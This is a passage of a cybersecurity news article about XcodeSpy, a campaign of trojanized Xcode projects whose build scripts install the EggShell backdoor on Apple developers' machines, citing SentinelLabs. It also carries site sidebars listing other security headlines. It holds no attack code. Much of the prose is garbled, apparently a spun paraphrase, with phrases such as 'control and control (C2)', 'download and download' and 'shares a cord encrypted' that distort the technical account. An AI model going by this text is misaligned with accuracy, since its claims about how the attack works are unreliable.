Saturday, June 12, 2021

Apple developers targeted by EggShell Backdoor

Must Read

Sopra Steria: Ryuk Attack May Cost Us $60m

French IT services giant Sopra Steria has confessed ransomware attack on its systems a month is very likely to...

How 2020 Has Changed the Information Privacy

The most crucial data privacy and protection events from 2020 and their effect on the US within the long...

A new Breed of card skimming Grelos malware is on the loose

Magecart Version has Shifted and You Ought to be Attentive, warns RiskIQ A new offshoot of this Grelos card-skimming malware...

Xcode malicious projects are used to hijack developer systems and distribute EggShell custom backdoors.

The malware, called XcodeSpy, is targeted by Xcode, an integrated development platform (IDE) used in macOS for Apple’s software development.

According to a study published by Sentinel Labs on Thursday, the Run Script feature in IDE is used in attacks targeted at iOS developers in the form of Trojanized Xcode projects freely distributed online.

Official, open Xcode projects can be found on GitHub. However, in this case, XcodeSpy projects provide “advanced features” to slash the iOS tab bars – and once the original build has been downloaded and set up, the malicious text is processed to install the EggShell backdoor.

A malicious project investigated by investigators is a ripped version of TabBarInteraction, an official project that has not been compromised. 

Run ID script is interrupted silently to connect the control and control (C2) server to the developer project.

Apple’s IDE functionality that allows Shell’s custom text to send when the app model is launched is a matter of abuse.

C2 then interacts with the script to download and download unique customizations outside EggShell, which includes user LaunchAgent persistence.

Two versions of EggShell have been discovered – one of which shares a cord encrypted with XcodeSpy.

The backdoor can hijack the victim’s developer microphone, camera, and keyboard, and capture and send files to the attacker’s C2.

SentinelLabs says at least one US organization has been caught in such an attack and Asian developers are likely to be defeated in the campaign, which operated at least between July and October last year.

Back-up samples were uploaded to VirusTotal on August 5 and October 13. XcodeSpy began uploading on September 4, however, researchers suspect the attacker may have downloaded the sample himself to test the detection rates.

“While XcodeSpy seems to be targeted at developers themselves rather than products or developers’ clients, it is a short step away from redirecting the developer’s workplace to deliver malware to users of that developer’s software,” the researchers said. “As a result, all Apple developers are cautioned to check for any serious Run scripts whenever Xcode projects from third parties are approved.”

Back in August, Trend Micro tracked XCSSET malware on Xcode projects, which are thought to have spread to compromise Safari browser sessions on sensitive identity theft, cross-site scripting (XSS), and theft of developer data.

The team said the discovery eventually led to “a rabbit hole for malicious payloads.”

a2434345d63481a40f0d145881b41013?s=96&d=mm&r=g
Priyanshu Vijayvargiya
Founder and Editor-in-Chief of 'Virtualattacks Inc' Priyanshu Vijayvargiya is a cybersecurity analyst, Information Security professional, developer, and a white hat hacker.

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest News

An error of coding results attacker will delete a live video of Facebook

Facebook has solved the problem of Programming errors on live video services that allow attackers to successfully remove video...

What is a Cyber Attack or Virtual Attack

Firstly We Wil Discuss About Cyberattack or we will also say virtual attack. A Cyberattack is a type of attack that will be done...

Firefox 88 start disabling FTP with removal set for Firefox 90

Firefox 88 update has disabled File Transfer Protocol (FTP) support completely from the browser. The handling of clicking on FTP links from within Firefox...

Google Project Zero giving The 30-day grace period for user patch adoption

Google Project Zero will be shifting from a fairly hard 90-day deadline to a new model that incorporates a new 30-day grace period to...

Parking app ParkMobile experiences data breach of 21M Users

The popular mobile app that drivers use to pay and find available public parking in Pittsburgh and in other cities experienced a data breach...

More Articles Like This